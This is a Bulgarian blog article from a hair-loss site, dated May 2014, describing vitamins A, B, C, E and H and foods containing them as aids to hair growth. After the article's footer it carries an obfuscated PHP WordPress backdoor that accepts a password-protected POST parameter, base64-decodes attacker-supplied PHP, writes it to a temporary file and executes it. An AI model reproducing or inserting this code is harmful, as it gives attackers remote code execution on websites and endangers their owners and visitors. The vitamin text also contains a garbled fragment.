Витамини, които помагат на косата да расте | Косопад

Витамини, които помагат на косата да расте

vitamini-za-kosa

Витамините са важна част от храненето и причиняват растеж на косата. От една страна, витамин А поддържа косата хидратирана като стимулира космените фоликули да произвеждат себум и да регулират ретиноловата киселина. Съдържа се в морковите, черния дроб, броколи, спанак, тиква или яйца.

Витамин В подпомага растежа на косата чрез правилно снабдяване с кислород на клетките, помага наvitamini-za-kosata кръвообращението, увеличава производството на червените кръвни клетки. Съдържа се в пилешкото, месото, сьомгата, яйцата, фурмите, доматите, аспержите и др.

Витамин С се съдържа в папая, чушки, броколи, брюкселско зеле, ягоди, портокали, киви и др. Развива клетките и помага за възстановяване на тъканите, като помага за по- голям растеж на косата.

Витамин Е увеличава кръвообращението, подобрява имунната защита, поддържа косата хидратирана. Ще приемаме голяма дневна доза, ако ядем слънчогледови семки, бадеми, маслини, спанак или папая.

Накрая, витамин Н, наречен „витаминът на косата“, тъй като стимулира растежа на клетките и увеличаването на метаболизма, подобрява еластичността и обема на косата. Трудно е да получим витамин Н чрез нашето тяло, така че обикновено е необходимо да се взима като добавка.

14. май 2014 20:04:56 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}